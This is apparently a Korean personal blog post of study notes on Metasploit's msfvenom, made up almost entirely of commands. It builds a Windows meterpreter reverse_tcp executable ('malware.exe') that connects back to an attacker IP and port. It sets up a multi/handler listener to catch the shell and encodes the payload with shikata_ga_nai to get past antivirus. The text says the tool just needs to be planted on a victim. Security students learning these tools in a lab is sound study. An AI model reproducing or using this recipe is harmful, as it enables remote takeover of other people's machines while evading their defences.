Metasploit - 08. msfvenom [작업중]
by jennysgapmsfvenom
# type msfvenom
# msfvenom -l
# msfvenom -l payload
msf를 이용한 악성 도구 제작
# msfvenom -l <key> : <key값>payload, encorder, nop 등의 모듈 정보 확인
# msfvenom -p windows/meterpreter/reverse_tcp lhost=Attacker_IP lport=Attacker_PORT
-f <file-type: exe, raw, c> -o File_NAME
악성도구가 만들어졌으니 심어주면 됨.
어태커는 서버용 프로그램 준비만 하면 됨.
# msfvenom -l payload
* 작성될 shell code 보기
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f c
* PE형태 windows 실행 파일 작성
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe -o malware.exe
나중에 이걸로 bf모드 공격할 때 사용할 예정. 그러니 코드 잘 봐두세욥
# ls -l malware.exe
# chmod 755 malware.exe
# file malware.exe
공격자 서버용 프로그램 준비
# msfconsole
msf> search exploit
msf> use exploit/multi/handler
클라이언트인데 지정하지 못할 때, RHOST, RPORT를 지정하지 못 할 때 이용
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.3.116 (공격자 IP)
msf> set LPORT 2000 (공격자 PORT)
msf> exploit
* Packing(encoding) 기술 적용 (백신 탐지 우회)
# msfvenom -l encoder
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe
-e <encoding_name> -i 1 -o malware.exe
-i : 몇번을 꼬을지 횟수
* 다른 악성도구 가져와서 패킹해도 됨! 단 신규로만!
* 패킹 된 파일은 패킹이 안됨!
* 윈도우7이든 윈도우xp든 다 됨
# msfvenom -l encoder
x86/shikata_ga_nai
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe -e x86/shikata_ga_nai -i 2 -o malware2.exe
다른 컴퓨터로 업로드나 다운로드 할 수 있음
윈도우 cmd 에서 할 수 있음
netsh>
리눅스와 윈도우 파일 공유하려면
1. samba를 이용하거나
2. share 폴더를 만들거나
3. ftp로 연결한다.
http://lureout.tistory.com/44
'BOX' 카테고리의 다른 글
운영체제의 기초 - 3. Review of Computer Hardware (0) | 2017.03.15 |
---|---|
운영체제의 기초 - 2. Introduction to OS 2 (2) | 2017.03.14 |
Metasploit - 07. 해킹 연습할 사이트 구축I [작업중] (0) | 2017.03.14 |
운영체제의 기초 - 1. Introduction to OS 1 (0) | 2017.03.14 |
깔끔한 제안서를 만드는 실용적인 팁 10가지 (0) | 2017.02.27 |
블로그의 정보
jennysgap
jennysgap